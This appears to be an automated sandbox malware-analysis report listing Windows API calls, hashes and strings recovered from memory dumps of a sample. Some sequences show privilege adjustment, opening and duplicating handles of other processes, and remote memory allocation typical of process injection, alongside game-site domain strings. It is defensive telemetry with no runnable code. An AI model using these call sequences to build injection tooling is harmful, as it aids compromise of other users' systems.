                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 4773dab19d53a97cdc3c8a9baa9ffe833f2486c84137d28514762cc4633b5f76
                                                                                  • Instruction ID: 18921f76270e4ade18f72780206b044ff0ee671f9d8f5041ff192adf198655e7
                                                                                  • Opcode Fuzzy Hash: 4773dab19d53a97cdc3c8a9baa9ffe833f2486c84137d28514762cc4633b5f76
                                                                                  • Instruction Fuzzy Hash: 1D1188742047068FC710DF18C881F82FBE1EF887A0F20C53AE9999B384E370E9058BA5
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004), ref: 0BE985E9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 7880ce713861cedebdbb9582be3cf70d42a9d49c83ac9731ab9613d1614e04af
                                                                                  • Instruction ID: fa98cbb6a1b3253d10e74296ecce60b6868dc5eb376445655b003a7e9b10a906
• Opcode Fuzzy Hash: 7880ce713861cedebdbb9582be3cf70d42a9d49c83ac9731ab9613d1614e04af
• Instruction Fuzzy Hash: D71196B56083029FD740DF3DD985A0ABBE4EF89794F108A6DE988DB3A4D370D944CB52
APIs
• Sleep.KERNEL32(00000001,000007D0), ref: 0040865D
Memory Dump Source
• Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 775f40985dda5b12ae45b1dd051a588b34f4d1a6a9f43efdd8e88aa6c1c871a2
• Instruction ID: 8cb7f5a38fb897feb26a5d9b144dddf35c5521c89a00febf70085c6762490ce9
• Opcode Fuzzy Hash: 775f40985dda5b12ae45b1dd051a588b34f4d1a6a9f43efdd8e88aa6c1c871a2
• Instruction Fuzzy Hash: 1EC01230648344C9E95021691B01B26329C0721788F02483BA989B17C0DDBFE8509AAF
APIs
  • Part of subcall function 6A6D3DC0: _memset.LIBCMT ref: 6A6D3DE0
• _memset.LIBCMT ref: 6A6D3F92
• GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 6A6D3FA4
  • Part of subcall function 6A6EE09C: _malloc.LIBCMT ref: 6A6EE0BA
  • Part of subcall function 6A6E8420: _malloc.LIBCMT ref: 6A6E8449
  • Part of subcall function 6A6E8420: _memcpy_s.LIBCMT ref: 6A6E8455
• _memset.LIBCMT ref: 6A6D4699
• _sprintf.LIBCMT ref: 6A6D46B8
• __wfopen_s.LIBCMT ref: 6A6D46CC
• OutputDebugStringA.KERNEL32(?,?,?,?,?,?,?,?,?,6A732B2C,00000018,00000017,00000016,00000015,00000014,00000012), ref: 6A6D46E8
• OutputDebugStringA.KERNEL32(6A71B18C,?,?,?,?,?,?,?,?,6A732B2C,00000018,00000017,00000016,00000015,00000014,00000012), ref: 6A6D46EF
• GetTickCount.KERNEL32 ref: 6A6D4793
• _rand.LIBCMT ref: 6A6D47A2
• _malloc.LIBCMT ref: 6A6D4834
• GetTickCount.KERNEL32 ref: 6A6D4892
• _malloc.LIBCMT ref: 6A6D4905
• _malloc.LIBCMT ref: 6A6D4A8C
• InitializeCriticalSection.KERNEL32(6A72FC8C), ref: 6A6D4AF4
• CreateThread.KERNEL32(00000000,00000000,6A6D3D00,?,00000000,00000000), ref: 6A6D4B0C
• _malloc.LIBCMT ref: 6A6D4BE5
• _memset.LIBCMT ref: 6A6D4BFF
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: _malloc$_memset$CountDebugOutputStringTick$CreateCriticalCurrentDirectoryInitializeSectionThread__wfopen_s_memcpy_s_rand_sprintf
• String ID: "$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$,+sj$C:\pl.txt$H+sj$H+sj$InitShareData hWndExe is : 0x%0X, m_sAppPath is : %s$p+sj$p+sj$p+sj$p+sj$p+sj$p+sj$p+sj
• API String ID: 1641542171-3725503571
• Opcode ID: e5876064084adaa83d7fa34f930d76bb05222657ad9f3fb279786a6e7755ec10
• Instruction ID: 428e46781bd96c8e259a964d8cc128868037d6de9057e96a8dcb73194cb7c4b2
• Opcode Fuzzy Hash: e5876064084adaa83d7fa34f930d76bb05222657ad9f3fb279786a6e7755ec10
• Instruction Fuzzy Hash: 1A62E6B294A344A7E711AFB4994C79A65D07FD13C4F0B082CD9649B263FFF5CD0882A6
APIs
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,6A6DA369,?), ref: 6A6D696B
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,6A6DA369,?,?,?,?,00000000,00000103), ref: 6A6D698F
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,6A6DA369,?,?,?,?,00000000,00000103), ref: 6A6D69A0
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: File$CloseCreateHandleSize
• String ID: $!$$$1$3$5$6$AppleM2$Askm2com$D$HGEM2$Www.GameM2.Com$Www.MirGom.Com$]$`$a$c$h$l$n$www.applem2.com$www.xm2m2.com
• API String ID: 1378416451-1139999902
• Opcode ID: 025e63ec9474064447508273356b14e77d9f843a7dc1ea65570891e0fb3dc71c
• Instruction ID: c280eb3a8afa16cc5ef3c68c48df59aed9988c0cc4584c92f54e382afd461d83
• Opcode Fuzzy Hash: 025e63ec9474064447508273356b14e77d9f843a7dc1ea65570891e0fb3dc71c
• Instruction Fuzzy Hash: 98B15A7160C2404FE3009B3C9C597ABBBD59F8A368F480629F4958F292EF75DA0D8397
APIs
• GetObjectA.GDI32(00000000,00000054,?), ref: 0BEB741C
• GetDC.USER32(00000000), ref: 0BEB742D
• CreateCompatibleDC.GDI32(00000000), ref: 0BEB743E
• CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 0BEB748A
• CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 0BEB74AE
• SelectObject.GDI32(?,?), ref: 0BEB770B
• SelectPalette.GDI32(?,00000000,00000000), ref: 0BEB774B
• RealizePalette.GDI32(?), ref: 0BEB7757
• SetTextColor.GDI32(?,00000000), ref: 0BEB77C0
• SetBkColor.GDI32(?,00000000), ref: 0BEB77DA
• SetDIBColorTable.GDI32(?,00000000,00000002,?,?,00000000,?,00000000,?,?,00000000,00000000,0BEB7968,?,00000000,0BEB798A), ref: 0BEB7822
• FillRect.USER32(?,?,00000000), ref: 0BEB77A8
  • Part of subcall function 0BEB4240: GetSysColor.USER32(8B0BEB55), ref: 0BEB424A
• PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 0BEB7844
• CreateCompatibleDC.GDI32(00000028), ref: 0BEB7857
• SelectObject.GDI32(?,00000000), ref: 0BEB787A
• SelectPalette.GDI32(?,00000000,00000000), ref: 0BEB7896
• RealizePalette.GDI32(?), ref: 0BEB78A1
• SetTextColor.GDI32(?,00000000), ref: 0BEB78BF
• SetBkColor.GDI32(?,00000000), ref: 0BEB78D9
• BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0BEB7901
• SelectPalette.GDI32(?,00000000,000000FF), ref: 0BEB7913
• SelectObject.GDI32(?,00000000), ref: 0BEB791D
• DeleteDC.GDI32(?), ref: 0BEB7938
  • Part of subcall function 0BEB4F00: CreateBrushIndirect.GDI32(?), ref: 0BEB4FAA
Memory Dump Source
• Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
• Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
• Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
Similarity
• API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
• String ID:
• API String ID: 1299887459-0
• Opcode ID: 3fbcbdff0bf8df4acfe6002550c97887027e15c360606154b36903f9037bec27
• Instruction ID: 30a3ced638870e887acd02d64f2228dc67d1cf0318926dbd2f27cdaaf578f3a3
• Opcode Fuzzy Hash: 3fbcbdff0bf8df4acfe6002550c97887027e15c360606154b36903f9037bec27
• Instruction Fuzzy Hash: B612E671A10208AFDB10EFA8C985FEEB7B8EB48314F119555F918EB691C774ED84CB60
APIs
• _memset.LIBCMT ref: 6A6DE421
• GetCurrentDirectoryA.KERNEL32(00000104,?,75923310,75920F00,00000000), ref: 6A6DE433
• _memset.LIBCMT ref: 6A6DE458
• GetLastError.KERNEL32 ref: 6A6DE460
• _sprintf.LIBCMT ref: 6A6DE474
• __wfopen_s.LIBCMT ref: 6A6DE488
• OutputDebugStringA.KERNEL32(?), ref: 6A6DE49E
• OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6DE4A5
• _memset.LIBCMT ref: 6A6DE4C9
• GetCurrentProcessId.KERNEL32 ref: 6A6DE4D1
• OpenFileMappingA.KERNEL32(000F001F,00000000,?), ref: 6A6DE50B
• CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,?), ref: 6A6DE521
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 6A6DE53B
• _memset.LIBCMT ref: 6A6DE546
• __wfopen_s.LIBCMT ref: 6A6DE569
• OutputDebugStringA.KERNEL32(==============begin==============), ref: 6A6DE57C
• OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6DE583
• __wfopen_s.LIBCMT ref: 6A6DE5A1
• OutputDebugStringA.KERNEL32(?), ref: 6A6DE5B7
• OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6DE5BE
• __wfopen_s.LIBCMT ref: 6A6DE5DC
• OutputDebugStringA.KERNEL32(==============end==============), ref: 6A6DE5EF
• OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6DE5F6
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: DebugOutputString$__wfopen_s_memset$File$CurrentMapping$CreateDirectoryErrorLastOpenProcessView_sprintf
• String ID: ==============begin==============$==============end==============$C:\789.txt$GetCurDir failed (%d)
• API String ID: 2828095576-3745111052
• Opcode ID: c4e249f8fa677c6367f8e008860ebb550b1ee52240b2e1b1580abc46f5014893
• Instruction ID: eee09f2a78f4bbc273eecb61ec94aa09a161db1ed46e8e118ec4d53371c66b0a
• Opcode Fuzzy Hash: c4e249f8fa677c6367f8e008860ebb550b1ee52240b2e1b1580abc46f5014893
• Instruction Fuzzy Hash: 975192B1408344ABD310DBA4DD85DAFB7F9AB9A248F050D2DF64992241EF34AE088767
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,0BE9AC64,?,0BEF80AC), ref: 0BE96249
                                                                                  • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 0BE9625A
                                                                                  • lstrcpyn.KERNEL32(?,?,?,?,0BEF80AC), ref: 0BE9628E
                                                                                  • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,0BE9AC64,?,0BEF80AC), ref: 0BE962FF
                                                                                  • lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll,0BE9AC64,?,0BEF80AC), ref: 0BE9633A
                                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll,0BE9AC64,?,0BEF80AC), ref: 0BE9634D
                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll,0BE9AC64,?,0BEF80AC), ref: 0BE9635A
                                                                                  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,0BE9AC64,?,0BEF80AC), ref: 0BE96366
                                                                                  • lstrcpyn.KERNEL32(?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,0BE9AC64), ref: 0BE9639A
                                                                                  • lstrlen.KERNEL32(?,?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,0BE9AC64), ref: 0BE963A6
                                                                                  • lstrcpyn.KERNEL32(?,?,?,?,?,?,00000104,?,00000000,?,?,?,?,?,?,?), ref: 0BE963CF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                  • API String ID: 3245196872-1565342463
                                                                                  • Opcode ID: d37d5e41c7418fa096f0618f9ae8ae31d759e7d00a5e7281d944eedf6e7f0b29
                                                                                  • Instruction ID: 53f423bf6ed6f67ecec44fcec354bced4d3e75250a453ba6d878646ffcd15d57
                                                                                  • Opcode Fuzzy Hash: d37d5e41c7418fa096f0618f9ae8ae31d759e7d00a5e7281d944eedf6e7f0b29
                                                                                  • Instruction Fuzzy Hash: D4514971D00229EFDF11DBE8DC85AEEB7B8AF48305F0415A2E015E7240D7749E48CBA5
                                                                                  APIs
                                                                                  • RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                  • ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                  • ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                  • ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                  • ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                  • ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                  • ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                  • ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • ZwOpenProcess.NTDLL(?,00000040,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA41
                                                                                  • ZwDuplicateObject.NTDLL(?,?,000000FF,?,001FFFFF,00000000,00000000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA63
                                                                                  • ZwQueryInformationProcess.NTDLL(00010000,00000000,?,00000018,00000000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA7B
                                                                                  • ZwDuplicateObject.NTDLL(?,?,000000FF,00010000,001FFFFF,00000000,00000000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDAB3
                                                                                  • ZwClose.NTDLL(?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDABE
                                                                                  • ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDADB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessVirtual$InformationOpenQuery$AllocateDuplicateFreeObjectSystem$AdjustClosePrivilege
                                                                                  • String ID:
                                                                                  • API String ID: 1854996211-0
                                                                                  • Opcode ID: a7080c8a29a511dc863db1d2f30086150afff212161d3e53916cbeb77f74a012
                                                                                  • Instruction ID: b66e8793ddd204e6f263d31d3aba01ba85fc161e5832f50f63a307362f76916a
                                                                                  • Opcode Fuzzy Hash: a7080c8a29a511dc863db1d2f30086150afff212161d3e53916cbeb77f74a012
                                                                                  • Instruction Fuzzy Hash: 2E6129B1108345AFD710DF95C884DABB7E8FB88754F048A2DF5A596290EB70EE44CF62
                                                                                  APIs
                                                                                  • _printf.LIBCMT ref: 6A6DB312
                                                                                  • _printf.LIBCMT ref: 6A6DB325
                                                                                  • CertGetNameStringA.CRYPT32(00000000,00000004,00000001,00000000,00000000,00000000), ref: 6A6DB338
                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 6A6DB34B
                                                                                  • CertGetNameStringA.CRYPT32(00000000,00000004,00000001,00000000,00000000,00000000), ref: 6A6DB369
                                                                                  • LocalFree.KERNEL32(00000000), ref: 6A6DB370
                                                                                  • CertGetNameStringA.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6A6DB382
                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 6A6DB38D
                                                                                  • CertGetNameStringA.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6A6DB3A5
                                                                                  • _strncpy.LIBCMT ref: 6A6DB3C3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CertNameString$Local$Alloc_printf$Free_strncpy
                                                                                  • String ID: %02x
                                                                                  • API String ID: 196360592-3293531392
                                                                                  • Opcode ID: 6b7791023d043c6b3d68f32c888b087d97cd2aea4433c9026033f522c5fb41f8
                                                                                  • Instruction ID: 56f356353c0d5e2f3fe35efc6f0c64127a0a4c6cd865561d27209fa99508376e
                                                                                  • Opcode Fuzzy Hash: 6b7791023d043c6b3d68f32c888b087d97cd2aea4433c9026033f522c5fb41f8
                                                                                  • Instruction Fuzzy Hash: 4241D671A01315BBD7109FA9CC85FAFBBF8EB49B54F114125FA04E7281DBB49D008AA4
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • VirtualAllocEx.KERNEL32(00000000,00000000,00000002,00003000,00000004), ref: 6A6E0228
